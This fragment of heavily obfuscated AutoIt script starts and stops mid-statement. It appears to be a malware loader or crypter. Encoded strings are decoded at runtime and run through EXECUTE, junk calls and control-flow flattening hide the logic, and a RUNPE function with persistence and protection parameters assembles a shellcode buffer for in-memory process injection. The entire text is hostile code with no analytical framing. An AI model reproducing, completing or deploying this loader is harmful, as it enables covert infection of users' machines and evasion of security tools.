3283063 ) ENDIF IF $864731176 = 176683708 THEN $BN = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28..,35,4..0,..2..7,44,5..1,46,4..1,..4..5,4..6..,44,..3..5..,40..,..3..3.." , ".." ) ) ) $864731176 = 1300820860 DIM $MKNWCPAOJCVF1GJLH6IS = 69587 + 3220933 * 2937281 + 4293372797 * 61801 + 4294813521 + 3551407 * 244707 ENDIF IF $864731176 = 256356752 THEN $E = EXECUTE $864731176 = 176683708 DIM $QNCYHONM0Q28ZVRMH1UN = 2509262 * 2379311 + 129909 + 4293667836 * 2893636 + 4293386776 + 3344262 ENDIF IF $864731176 = 781366022 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..57,..59..,3,59..,3..,5..7..,..5..6,59..,5..4,5..9..,3,..5..9..,..3,..5..5,6..1..,..55..,..6..0,59,5..4,..5..9,5..7,60,59..,59,..54..,..60,..5..3..,..5..9..,6..2..,..5..6,..56..,..56,..55,..55,5..,59,57..,59,..3..,..59,3,..55,60..,5..5,..3..,..55..,5..3..,..5..5,60..,..59,..6..2..,5..9..,5..,6..0,..57..,..5..5..,60..,5..5,3,..55,5..3,..5..5..,..60..,..58,..56,..59,58..,..60..,57,..5..7..,..2,..59..,..5..8,6..0,..55,59..,..5..,5..9..,..5..8,..59,..3..,..57,..6,..59..,..5..5..,5..9..,1,59..,58..,5..9..,..5..6..,..6..0..,..57..,..58,5..6..,..59,..5..8..,..59..,..56,..60,..5..8,..60,..55,59,..62,60,5..7..,..60,6..2..,..55,..6..0..,..55..,3..,5..5,..5..3,55..,6..0,..60,5..3..,6..0..,5..7..,6..0,55,5..5..,6..0,55..,3..,..55..,53,55,..5..7,..59..,..6..1..,..5..9..,..54,..59,..5..,59..,..5..7..,..5..9..,3..,..59..,5..8,..5..5..,..3..,..5..5,..53,..55..,..6..0,5..9..,57,6..0..,..60..,5..9..,..6,6..0,5..5..,59,57..,..5..5,..60..,..5..5,3,..55,5..3,5..5..,..60,..5..6,5..3..,60,..6..1..,5..6..,..5..3..,5..6..,57..,55..,60..,..55..,..3..,55..,..53,5..5,6..0..,..6..0..,..53,60..,57..,..60..,..5..5..,..55,60..,..5..5..,..3,5..5..,..5..3..,..55,..57..,..60..,..53,..58..,..56,57..,5..7..,55,..62" , ".." ) ) ) ) RANDOM (3374839 ) EXITLOOP ENDIF IF $864731176 = 1027989821 THEN LOCAL $PSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,57,..5..7,59..,..3,59,..3..,58..,..5..6..,6..0,..5..7..,6..0..,5..5,6..0,..5..8,..59..,..56..,..60..,57..,..57,..60..,..59..,..58,60,..57..,58,..53,..60..,..57..,60,55..,5..5..,6..1,..5..5,..5..7..,..60..,..57..,58,..56,57,..57..,..55,..6..2" , ".." ) ) ) ) $864731176 = 1138660241 WINEXISTS ("Vt25GlQLqwe4TDurZiboJwjb3rsXglk0zF7lFhsmAf9KVGM01" ) ENDIF IF $864731176 = 1138660241 THEN LOCAL $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,..5..7..,57,5..9,..3..,5..9..,..3,..57,..5..6,..5..9,..5..4,..59..,..3..,59,..3..,55,..61,..5..5..,..60,..59,5..4,59..,57..,..6..0,5..9..,5..9,54,60,..53,5..9,62,5..6,5..6,..56,..55..,5..5,..5..,..5..9..,5..7..,..5..9,..3,5..9,3,55..,60..,..5..5..,3,..55,..53,55,..6..0..,5..9..,..6..2,..59..,..5,6..0..,..57..,55,..60,..5..5,..3..,..5..5,53,55,60,57..,..62..,..5..9..,..5,5..9,6..2..,..60,57,..5..9..,..62,..5..9..,..5..4,..59,..3..,..5..9..,6..2..,60,1..,..59,..58,5..8,5..6..,59,..5..8,..5..9,56..,60..,..58,6..0..,..55..,..5..9,6..2..,6..0..,57,..6..0..,6..2,57,5..7..,..59..,..5..8,6..0,56..,59..,56..,6..0,5..5..,5..9,..62,..60..,..5..3..,60,..5..7,59,..6..,..6..0,..5..5,5..5,6..0,..5..5..,..3,..55..,5..3,55..,..6..0,6..0..,53..,..6..0..,..5..7,..60,..55..,..5..5,6..0,..55,3..,..55..,5..3,5..5,..5..7..,..60,5..3,5..8,5..6,5..7,5..7..,..55,3..,55..,..5..3..,55..,60,..59,5..7,..6..0..,6..0,5..9,..6,..6..0,..5..5,59..,57,..5..5,6..0,55..,3..,..55,..5..3..,5..5..,..60..,56..,..5..4,5..5,6..0,5..5..,62.." , ".." ) ) ) ) $864731176 = 1924764602 ISBINARY (1582475 * 129845 ) ENDIF IF $864731176 = 1203322726 THEN LOCAL $PACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,5..7..,57,59..,..3,59,..3,58,5..6..,60..,57,..60..,..5..5,6..0,..5..8,..59,5..6,6..0..,57..,57,6..0..,59,5..8,..6..0,..5..7,5..8,..53,60,..57,..6..0,5..5..,55,..6..1..,..55,5..7,..6..0..,..57..,..57..,54,57..,..5..6,57..,..3..,55..,..6..2.." , ".." ) ) ) ) DIM $LODNFJWSZZYEXIPWOB65 = 73573 $864731176 = 113519199 ISBOOL ("fdtHJ3yFcztSzB2W1taKLOJA6JeTaTF7hhMWEp5DkTtohnEIJA3wHzczC3K9ZOEt3wJsZgrKyFA2uu" ) ENDIF IF $864731176 = 1300820860 THEN LOCAL $TACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,..5..7,57,5..9..,..3..,59..,3..,5..8,5..6,..6..0,57..,60,5..5..,..6..0..,5..8,5..9..,..5..6..,..6..0,..5..7,..5..7,..5..6..,..6..0,55..,59,5..8,..5..9,..5..4..,..60,5..7,59..,58,..5..5..,61..,..55..,..55,59..,..5..5,..60..,..62..,..6..0,..5..7,..5..9..,..5..8..,5..5,..5..3,57,..5..4..,5..9..,..56..,..5..9,..3,58..,55,5..9..,..5..8..,..6..0..,..59,59..,62..,6..0,5..6,..5..9,..6..2..,5..9..,..6,5..9..,..5..,..56..,2,..5..9..,5..5,..60..,62..,..60,..57,59..,..58..,..5..5..,..5..3..,..5..8..,5..6,..59..,..5..5..,..60..,1,5..6..,..54..,..5..6,..2..,..6..0,58..,60..,5..6,59..,..6..1,..59..,6..,6..0,55,..60..,..57..,5..5..,..5..3,5..7,54,59,..5..6,5..9..,3..,5..8..,5..6,..59..,6..2..,..6..0..,..1..,..5..9,58..,..56..,..2..,6..0,..5..8..,..60..,..5..6,59..,..61,5..9,..6,..60..,5..5..,..60,57..,..55,..53..,..57,54,5..9,56,5..9,..5..8..,5..7,..5..6,59..,..6..,..6..0,..58,59..,..5,60..,57,56,..2..,60,58,60..,5..6,..5..9,..61..,..59..,..6..,..6..0..,..55..,..6..0,..57,..55,53..,..58,..5..6..,59..,55,60..,1,5..6,55..,..5..5,..55..,..55..,..6..2" , ".." ) ) ) ) $864731176 = 1203322726 ENDIF IF $864731176 = 1655436234 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,5..7,..57..,..5..9,3,..5..9,..3..,5..7..,5..6,..59..,..54,..5..9..,..3..,59..,..3,..5..5,61..,..5..5,..60,59,..5..4..,59,..57..,60..,..59,59..,..54,..6..0..,..5..3..,..59,6..2,..56..,5..6..,..5..6..,5..5..,55..,..5..,5..9,..57..,..5..9..,3..,5..9..,3..,5..5,6..0..,55,..3,55,5..3,..55..,..6..0,5..9,..6..2,5..9..,..5..,..6..0,..57..,..55,60..,..55,3..,55..,5..3,5..5..,..60,5..8..,5..6,..59..,5..8,..60,..5..7,5..8..,..56..,5..9..,..58,59,..5..6..,6..0,5..8..,60..,5..5,5..9..,62,..6..0,5..7,..60..,..6..2..,..5..7,5..7..,5..9..,..5..8,..6..0..,5..6..,59,..5..6,..60,55,..5..9,..6..2..,60,5..3,6..0..,57..,..59,..6,..6..0,55..,57,..5..7,..5..9,5..4..,..59..,..56..,5..9,3,..55,60..,55..,..3..,5..5,5..3..,..5..5,6..0,6..0..,53..,6..0,57,60..,..55..,5..5,6..0..,..55,..3,5..5..,5..3,55..,..5..7..,..60,5..3,5..8..,..5..6,5..7,57,55,3..,55,..53..,55..,..60,..5..9,6..2..,..59,5..,..60,5..7..,55,..6..0,5..5,..3..,..5..5..,..53..,..5..5..,..6..0,..5..6,..5..4..,55..,6..0..,..5..5..,3,..55..,..53,5..5,..6..0..,..60..,..53..,..60,..5..7..,..6..0,..55,..5..5..,..60,..55,3..,..5..5..,5..3,..5..5..,57..,..6..0,53..,5..7,54,..57..,56..,..5..7..,..3..,55..,3,55..,..5..3..,..5..5..,..6..0,..59,6..2..,59,5,60,5..7..,..5..5,..60..,55..,..3,..55..,5..3,5..5..,..6..0,..5..6,..5..3..,55,60,..5..5,6..2.." , ".." ) ) ) ) CHR (2826920 ) $864731176 = 781366022 ENDIF IF $864731176 = 1924764602 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,..57,..57..,5..9..,..3..,..59..,3,..57..,..5..6..,..5..9..,54,..59,3,5..9..,..3..,..55..,6..1..,55..,..6..0..,..5..9..,..54,..59..,..5..7,6..0..,..59..,..59..,..54,60,53,..5..9..,6..2..,..56,56..,5..6..,..5..5..,..55..,5,..5..9..,5..7..,59..,3..,5..9..,..3..,5..5,60..,..5..5..,3,5..5..,..53..,..5..5,..60..,..5..9,..6..2,..5..9..,5,6..0..,..57,55,..60,..55..,..3..,..55..,..5..3,5..5..,..60,..57..,6..2..,59,..5,59..,62..,6..0..,57..,5..9,62,5..9..,..54,..59,..3..,..5..9,6..2..,60,1..,5..9..,..5..8,57,5..4..,..59..,..56,5..9,..3..,..55..,6..0..,5..5,3,5..5,..53,55,60..,60,53,60,5..7,..60..,..5..5,..5..5..,..60,..55..,..3..,55,..53..,55,5..7,..60,5..3,..57,54,5..7,56..,5..7,..3,..5..5,3,5..5,53,55,..6..0..,59..,..57,6..0,..60,5..9,..6,60,..55..,..5..9,..57,5..5..,60..,55,3,55,..53,57,57,5..9..,..3,5..9..,..3,..58..,56,..6..0,..5..7,..60..,..5..5..,60,5..8..,59..,5..6,..60..,57..,..5..7,6..0,..5..9,58..,..60,..5..7,58,..5..6,..59,..62,..6..0,..1,..59,..5..8,5..5,..6..1..,..5..5..,..5..7..,60..,..57,..57,54,..57..,..56,..57,3,..5..5..,..62..,5..5,3..,5..5..,..5..3,..5..5,..60..,5..9..,..5..7..,..60,60..,..59,6,60..,..5..5..,5..9..,5..7..,5..5..,..6..0,55..,..3..,..55..,..5..3..,5..5..,..6..0..,..56,..5..5,..55..,..60,55..,..6..2" , ".." ) ) ) ) ISBINARY ("avVNlTCjs7c9jfhJ23tF5DV62n" ) $864731176 = 1655436234 ISFLOAT (1912442 * 2625958 + 3975194 + 4294644196 ) ISFLOAT ("kxS4hkcVbu9rFJYV7fQDuDkdEVicY9GZF7JIjtFLMlBF6wYyTt6Qa5lRmNyvc97" ) ENDIF NEXT ENDFUNC FUNC HJTWPSKJJP ($TITLE , $BODY , $TYPE ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..27..,38,45,3..1.." , ".." ) ) THEN $NLIVQGZCBCYM ($TYPE , $TITLE , $BODY ) ENDIF ENDFUNC FUNC RUNPE ($WPATH = "" , $LPFILE = "" , $PROTECT = "" , $PERSIST = "" ) GLOBAL $656182541 = 256356752 GLOBAL $WHAOKNJD1I = 673474 FOR $E = 0 TO 175490 DIM $TSDD1YJW3WF4JJNOYTWJ = 1007376 + 4293029922 * 1166129 + 3804418 + 199124 + 4292793209 + 4293898758 + 4293737743 IF $656182541 = 9803637 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,57,..5..9..,3,59,3,..58,5..6,60..,..5..7,..6..0..,55..,60,..58..,59,..5..6,6..0..,5..7..,..58,56,5..9,5..8,60,..57..,57..,5..7..,..59..,..5..4,..60..,..57..,59..,54,..5..5..,..6..1,..55..,57,5..7,..5..9..,5..9..,62..,59,3,..59..,..5..8,..5..8,..6..,58..,5..6,60..,5..7,..6..0..,..55,60..,5..8,5..9..,56..,..6..0,57..,..5..5..,..3..,5..5,53,5..5,..5..5..,5..9,..1..,..5..9,..2..,6..0,5..6,5..9..,..57,5..9,..59..,5..9,6..1..,59..,2..,..5..9..,1..,5..9..,..57..,..6..0..,56,6..0,..5..4..,59..,..6..1..,..59..,5..9..,..59..,2,59,1,..60,..5..4..,..6..0..,56,59..,61,..59..,5..7..,59,59..,59,..2,..59..,..1,..59,57..,..6..0,5..6..,..60,54..,5..9..,..61,59,..6..2..,..5..9..,..5..9..,6..0..,..5..8,..59..,61..,..60,5..6..,59,..57,6..0,54..,..5..9..,62,59..,5..9..,..5..9..,..5..5,..5..9..,5..,60,59,59,1..,..5..9..,..2..,5..9..,..3,..6..0..,5..6..,..59..,5..7,6..0..,..5..9,..60,..5..6..,6..0..,..54,..59..,57,59..,..59,60,..56..,5..5,55..,5..5,..3..,..55..,5..3..,..5..5,..5..7,59..,..3,60..,5..3..,..57..,..59,5..9,6..2..,..5..9,..3,..5..9,5..8,5..5,..6..2" , ".." ) ) ) ) RANDOM (3776848 ) $656182541 = 1586164444 WINEXISTS ("UzDn4M6vHRu" ) ENDIF IF $656182541 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56,3,..6..0..,..5..,2,..5..,..6..2,58..,5..8..,6..1..,2,5,..3..,..61..,..5..4..,5..,..3,6..,53,..53,..5..6,53,..5..3..,5..3..,53" , ".." ) ) ISPTR (3442150 * 965098 * 3906138 ) $656182541 = 2032766480 INT (3829084 ) ISPTR ("CqLMHQC1iaLlSS71SnmEQd2cggOmpjmj5koenindxNJnnX" ) ENDIF IF $656182541 = 39019882 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60..,5..9,..5..4,6..1,..6..1..,62..,60..,5..8..,3..,..6..1,6..1..,..4,57..,58,2..,..57,..3..,6..0,6..1..,5..8..,5..8,..6..1..,6..,6,..6" , ".." ) ) INT (405923 ) $656182541 = 1885155689 ISFLOAT ("IFAbpK9YBpHC3NIaigbDNZtkL4jfaJaCZQNLWcidJzVGxI" ) ENDIF IF $656182541 = 50926388 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,6..0,..58,..4..,..3..,..6..,6..,..58,58,1,..5..3..,6..1..,5..8,3,..5..3,..53..,..6,6..1..,..5..7,62..,61..,53,..55..,..53..,5..3" , ".." ) ) $656182541 = 868457996 ENDIF IF $656182541 = 61093985 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,..61..,..4..,5..7,..58..,3..,..5..7,61,..62..,6..1..,..58..,..5..7,3,6..,..6,..6,6,..6,6,..61..,..4..,..57..,..5..8,1.." , ".." ) ) ISPTR (776663 + 4293584104 ) $656182541 = 1053930317 MOD (335955 , 2573866 ) ENDIF IF $656182541 = 90298599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..8,..6..,..61..,..6,..6,..6..0..,5..8..,4..,61,..6,..6,..58..,58,..4..,57,..61..,5..8..,..3..,..53,5..3..,..6,61,5..7,..6" , ".." ) ) $656182541 = 1279551750 DIM $883ODWXCERLYILW464AF = 2544328 ISFLOAT (3562572 + 3716916 ) ENDIF IF $656182541 = 92596336 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,6..2..,61,..58,..56..,..5..7..,..6,..6,..6,..6..,6,..6,..61..,..4,5..7..,..58,4..,..5..7,..61,..62,..61..,58..,..56,6..1..,6.." , ".." ) ) $656182541 = 1604509846 INT (3385463 ) ISSTRING (1633230 + 4291607498 * 1105641 ) ENDIF IF $656182541 = 100830152 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..1..,57..,54,..2,..6..,5,..6,6..,6..,..6..,..6,6..,60,..5..8..,4,3,..6..,6..,..58..,..58..,1..,3,61,58.." , ".." ) ) DIM $STREGTCKWMLKEEHTNF0Y = "f3Aobcr61zMjpam4yao1OuY3E48oFFlj5RmZ00EQln" $656182541 = 463618680 RANDOM (66547 ) ENDIF IF $656182541 = 113519199 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..4..,..6..0..,6,..6,..6..,6,..6,..6,61,2,..3,..6..1..,6..1..,5..8..,3..,..6..2,60..,..5..7..,..5..5..,..5..3..,..53..,..6..,2,5" , ".." ) ) PTR ("6QVfHTgecAunCnHXwdHEIQAZa3DQCtgRfH9aBUrgyLiXkIFXRSHvqKcqo5fNoAKTuNi5oGuM" ) $656182541 = 1027989821 DIM $6HNOAXR8VVUZEETVFON1 = 3908581 ENDIF IF $656182541 = 116471326 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,53..,53..,53,..53,6..1..,..2,60,59,5..3,3..,..61,2,6..0,..59..,..53..,3,6..1,..2..,56,5..9..,61,2..,..56,59.." , ".." ) ) $656182541 = 1196440215 STRING (2368921 + 4294584284 * 2414981 + 2570255 ) ENDIF IF $656182541 = 116925729 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..6..1,58,60,..5..3..,6..,6,6,..6..,..6..,6..,62,6..2..,..2,5..3,..57..,..6..1,5..3,..5..9,3..,..6..0..,..6..1..,5..8,60..,..5..7" , ".." ) ) $656182541 = 1270739258 MOD (2548954 , 1686916 ) ENDIF IF $656182541 = 143550684 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..58,..58..,..2..,57,61,..2..,57,..4,6,53..,61..,..4..,60,..6,5..5,..61,5..3,..6,..2,..6..0,57,59,..5..3,..5..9" , ".." ) ) PTR (494270 + 3757030 + 701676 ) $656182541 = 605510513 PTR ("jJ9yajobwtGkA2sXkcwH7CpyjJAiMDyLAiANNaELJ6VpJVRs0mLfB02QtKpzTfx245TsANjjGV8aS9Yx2hsz2tjKpVtcVf2DI2vO" ) ENDIF IF $656182541 = 158308218 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..61,..5..3..,..5..7,..3,60..,..57..,5..8..,6..1..,5..3..,..1,6..2..,..55..,4..,..4..,60,53..,..5..4,3,6..0,57..,5..8..,..6..1,57..,53.." , ".." ) ) $656182541 = 1922466865 DIM $BHR118UW1GLX79KVHCQU = "yB3EBZNjvDqhw" ENDIF IF $656182541 = 172415000 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,5..8..,4,61,6,..6,58..,58,..1..,..61,61,..5..6..,6..,2..,53,5..8..,53,6,..6..1..,..59,..6..0..,60,..6..,..3,6" , ".." ) ) $656182541 = 1513972166 WINEXISTS ("qRL2U34wl07dgXvyiQMEduOJJ0rxM3v0D3MY063pBheqywNQx9NsMyE5bbs4KFTsEh" ) ENDIF IF $656182541 = 176683708 THEN LOCAL $BIN_SHELLCODE = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..58..,58,6..1,2..,5..,3,61..,..2..,5..7,..4..,..5..3,..61..,61,..2..,..3..,54..,6..1,..53..,5..6..,6..2..,..5..3,..53,..60.." , ".." ) ) DIM $ILXXC5PYLMLLAMOCMFYR = 3157420 * 2564471 * 2581599 * 1575695 * 3055616 $656182541 = 1300820860 ENDIF IF $656182541 = 180257576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..,..60,..5..8,6..,6..1,6..,6..,..60..,5..8..,..4..,..61..,..6,..6,58..,5..8..,3,..3,..6..1..,58,3,..53,..5..3..,6..,..6..1" , ".." ) ) CHR (2032782 ) $656182541 = 1791187076 ISBINARY (392562 * 2059814 + 238926 + 4291304449 ) ENDIF IF $656182541 = 210168720 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..54..,53..,..5..7..,5..4..,62,..6..1..,..2,..5..7,..4,6..,53,6..1..,..2,..57..,5..5,53,57,..57,54..,61..,..56,5,61..,..53.." , ".." ) ) $656182541 = 1032281943 PTR (415365 + 4292446165 * 1664935 ) ENDIF IF $656182541 = 217336870 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("62,5..8..,58,5,3..,..59,..5..9..,..5..6..,6..2,54,54,..53..,6..,6..2,57..,3..,..5..3..,..5..6,..4,..5..7,..4,..58..,1..,53..,53.." , ".." ) ) DIM $WG7T0CJ8HPOZSTSWSNCE = 2708682 * 2769324 + 4293939872 $656182541 = 439011666 ISFLOAT (3481491 * 1150538 * 3853364 ) ENDIF IF $656182541 = 229030474 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..,53,..54..,53..,..6..1,..5..6,..3..,..5..3..,..5..4..,53,..5..,2..,54,..5..8..,61..,..58..,3,..5..3,..6..0..,..62,..5..3,58,5..9..,1.." , ".." ) ) CHR (2387029 ) $656182541 = 2081176827 ISBOOL ("oUuFggefG10ACY0jb1qXezAwyHQLD34hAJXAOAJ2XqwAfGrjJAUirrKZt7gHzCKM6S93bzEKry9Ycaq2q" ) DIM $IW0J87HRTBCUOTEXGYIK = "j13rXWtQor3AHDk105drXrp6OitF3v2x1g9471klYafUI3gptFRDe2i2K7MNCYX2zFJBEp48U2DWlFwVbdlxNxs87gt9oFSanmtdtOVeKTTmywQe" ENDIF IF $656182541 = 238457315 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..3,..53..,5..3..,6..,..61,57..,..5..,61..,5..3,55,5..3,53,..5..3..,..53..,..6..1,..4..,57..,..5..8,..4..,6..1..,..5..8..,..5..3,..61,4.." , ".." ) ) ISBINARY ("yobmKDx65TnjCH9ltAvsgX5OgIKAoyw3sxZ8s0TlxiQ9Fc5ZR3qAqgFLtwfb37RFwu0fSb3CSk" ) $656182541 = 1461966853 DIM $5JDNVTVI5MM1NN5URSZA = 623493 MOD (3373745 , 405146 ) ENDIF IF $656182541 = 256356752 THEN #region xjFCr ISPTR (395861 + 4292989638 ) $656182541 = 176683708 ENDIF IF $656182541 = 269998012 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,5..8..,5..8..,2,..57..,5..6..,..5..6..,3,..5..3..,6..1..,..62,..60,4,..6,..5..3,59,59..,..5..6,2,..57..,5..9,..53,..59..,6..0" , ".." ) ) $656182541 = 800246788 ENDIF IF $656182541 = 287505096 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,56..,62,..2..,5..,..1..,5..7..,..5..3,5..3,..53,53,..5..3,..53..,..60..,57,..5..3,..62..,6,59..,..57..,5..9..,..54,..5..9,..53..,..5..4.." , ".." ) ) ISSTRING ("Sa2EG7s81XOdvvmGbtSqSStkmeWlCIMKtceSnQaGeolJBkabnlL3WfoaRRsCkhErkeTtqEsvtllCGTSbeV7r7TYnXeaGxHv7U3zxARUT2pJK3VD88qy" ) $656182541 = 2119340110 ENDIF IF $656182541 = 369187565 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,55,5..8..,6,..6..,..53..,..6,53..,..5..3..,5..3,53..,53..,..56..,53,55,..6..1,..62..,..57..,5..8,..5,3..,61..,2,..3..,..6..1" , ".." ) ) $656182541 = 1014469933 MOD (1959426 , 3057786 ) PTR ("MsuJxaoyRintbKcIgj6XGI8h5kGohrYVOc0OMQby5XMsclELBm1L3BleunOmD9rztBO9Uw5ziG1T5OeUO4W4zm1" ) ENDIF IF $656182541 = 411711931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,4..,..2,..3..,6..1..,6..2,..57..,58..,4,..5..3,5..6,..62,..2..,..5,1..,53,..5..3..,..5..3..,5..3..,53,5..3,..5..3,6..0,..57..,5..4.." , ".." ) ) $656182541 = 287505096 CHR (90223 ) RANDOM (2037841 ) ENDIF IF $656182541 = 432319576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..61..,4,..57..,..58,3..,..53..,6..1,..6..2,..6..1,..58..,..56,5..3,6..,6..,..6..,..6,..6,..6,..61,..4..,57..,5..8,..62..,..6..1.." , ".." ) ) $656182541 = 92596336 ISSTRING (341049 + 4293033473 ) ENDIF IF $656182541 = 438111387 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,53..,5,..2..,..54..,6..0..,..55,..5..8,..5..3,53,53,5..3,..53..,..53,..5..7..,53..,6..,..6..0,..4..,61..,5..4..,..2..,3..,53..,6..1" , ".." ) ) $656182541 = 229030474 WINEXISTS ("Imw9hJBi7cEytL4nSRDnjcRM8SELyMNrgqvTin0adx4cWcjVQnA8NQxGFUbyf0Tt" ) ENDIF IF $656182541 = 439011666 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3..,6,..61..,57..,..53,5..,..53..,5..6..,..5..3..,..5..3..,..53..,..53,5..6,5..6,..3,53..,..5..6,62..,..54..,..5..9..,53,..6..,..62.." , ".." ) ) $656182541 = 1477365537 ENDIF IF $656182541 = 463618680 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..5..3..,..53,..6,..61..,5..7..,..5..3,..4..,6..,..5..,..6,..6..,..6..,6..,61,2..,57,5..8..,..5,5..3,5..,..2,..5..4..,4..,61.." , ".." ) ) DIM $HN16HU5KMQMZ3YMXMA4M = 2575191 + 4292344773 + 4291991878 + 1995746 + 4294436912 * 542630 + 2078330 $656182541 = 1577105263 PTR (318373 + 4291289985 + 4294495476 * 2306951 ) CHR (3915271 ) ENDIF IF $656182541 = 467902548 THEN LOCAL $SHELLCODE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,5..7..,..5..7,5..9,3..,5..9,..3,..58..,..5..6..,..60,5..7,..60..,..5..5..,..60,5..8,..5..9..,..56,60,..57,5..7,56..,..6..0..,55,5..9,58,..5..9,..54,..6..0,..5..7,..5..9,5..8..,55,61..,..5..5,..5..5..,..5..9..,..5..5,..6..0,62..,60..,57,..59,..58..,5..5,..5..3,59..,1,..59..,5..9..,5..9..,57..,59,..6..,..5..9,6..2,..59,..2,59..,..1..,5..9,..6..1,..5..9,..59,59,57..,59,..6..,..5..9..,6..2..,..60,..5..4,..5..9..,..1..,59..,..59..,5..9..,6..,5..9,..62,..5..9..,1,60..,54..,5..9,..57..,60..,5..6..,..5..9..,6..,..59..,62,5..9..,..59..,5..9..,..1..,59..,..5,59,57,..60,..5..6,6..0..,..54..,..59,6..,..5..9,..62,..5..9,59,5..9..,57..,59..,5..9,6..0..,..56,..6..0..,..54,..59..,6..0,60,5..6..,..58,..2,55..,5..5..,5..5,5..3..,..5..5,..5..9..,..55..,..5..3..,5..5,..5..7,..59,55..,5..9..,..6..2,59..,5..,5..7,3,..55..,..53..,..55,59,..55,53..,55..,..5..5,58,..4..,..55..,..5..5..,55,..3,..5..5,53..,..55..,5..7,5..9..,3..,6..0,..5..3..,..58..,..5..6..,..5..9,..6..1,..5..9,..58..,59,..3..,..59,..3..,..5..9..,..56,..5..9..,..6,..59,57..,..59..,5..8,5..5..,..62.." , ".." ) ) ) ) CHR (2288460 ) $656182541 = 1859058315 ISBOOL (1174237 + 4294009768 ) ENDIF IF $656182541 = 469934669 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,2..,..6..0..,57,..3..,..5..7,..1,..5..3,..6..1,6..1..,..5..4,5..,54..,6,6..,..53..,..6..,53,5..3..,..5..3,..5..3,5..3..,56,5..3,..1.." , ".." ) ) $656182541 = 210168720 ENDIF IF $656182541 = 496318929 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..6..,6,..6,..6,..6..,..6,61,6..2..,..53..,54,..6..1..,58,..3..,..53,..53..,6,..61..,57,..62..,..54,5..3..,5..6..,53..,..53.." , ".." ) ) $656182541 = 1223622893 DIM $C6927DFAOTKIC11K2YHD = 2117293 ENDIF IF $656182541 = 543265363 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,5..6..,..61..,56..,2..,..6,1..,..5..7,53..,53,53..,..5..3..,5..3,53,..5..3..,5..3,60,5..9,..5..9,..2..,61..,..2..,..57..,5..5,..5..3.." , ".." ) ) DIM $81BMMJYAODEDSTEK5LKY = 3520351 $656182541 = 1921072536 WINEXISTS ("lAYHLV23fb2nE4J3yXYrI46I5pwnM" ) ENDIF IF $656182541 = 586524435 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,6..,..6,6..,..6,5..,5..,5..6..,61,6..1..,56..,..53,3,3,..6..0,..61..,5..8,59,57,..6..,6..,6..,..6..,6" , ".." ) ) $656182541 = 1453481599 ISBOOL (2037682 + 1703481 + 4293323427 ) ENDIF IF $656182541 = 602321455 THEN #region WuJTXvRqoS $656182541 = 1079557876 CHR (1677329 ) ENDIF IF $656182541 = 